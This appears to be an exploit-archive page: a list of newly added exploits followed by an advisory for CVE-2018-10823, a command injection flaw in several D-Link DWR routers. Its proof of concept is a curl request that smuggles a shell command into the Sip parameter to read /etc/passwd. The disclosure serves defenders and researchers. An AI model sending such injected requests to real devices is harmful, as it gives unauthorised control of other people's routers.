dac8dd4731
15 changes to exploits/shellcodes Adult Filter 1.0 - Denial of Service (PoC) Microsoft Data Sharing - Local Privilege Escalation (PoC) Webmin 1.5 - Web Brute Force (CGI) exim 4.90 - Remote Code Execution School ERP Pro+Responsive 1.0 - 'fid' SQL Injection SIM-PKH 2.4.1 - 'id' SQL Injection MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection School ERP Pro+Responsive 1.0 - 'fid' SQL Injection SIM-PKH 2.4.1 - 'id' SQL Injection MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection SG ERP 1.0 - 'info' SQL Injection Fifa Master XLS 2.3.2 - 'usw' SQL Injection Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting LANGO Codeigniter Multilingual Script 1.0 - Cross-Site Scripting Apache OFBiz 16.11.04 - XML External Entity Injection D-Link Routers - Command Injection D-Link Routers - Plaintext Password D-Link Routers - Directory Traversal Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes
23 lines
No EOL
735 B
Markdown
23 lines
No EOL
735 B
Markdown
## Shell command injection
|
|
CVE: CVE-2018-10823
|
|
|
|
CVSS v3: 9.1
|
|
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
|
|
|
|
Description: An issue was discovered on D-Link routers:
|
|
|
|
DWR-116 through 1.06,
|
|
DWR-512 through 2.02,
|
|
DWR-712 through 2.02,
|
|
DWR-912 through 2.02,
|
|
DWR-921 through 2.02,
|
|
DWR-111 through 1.01,
|
|
and probably others with the same type of firmware.
|
|
An authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.
|
|
|
|
PoC:
|
|
|
|
Login to the router.
|
|
Request the following URL after login:
|
|
`$ curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd`
|
|
See the passwd file contents in the response. |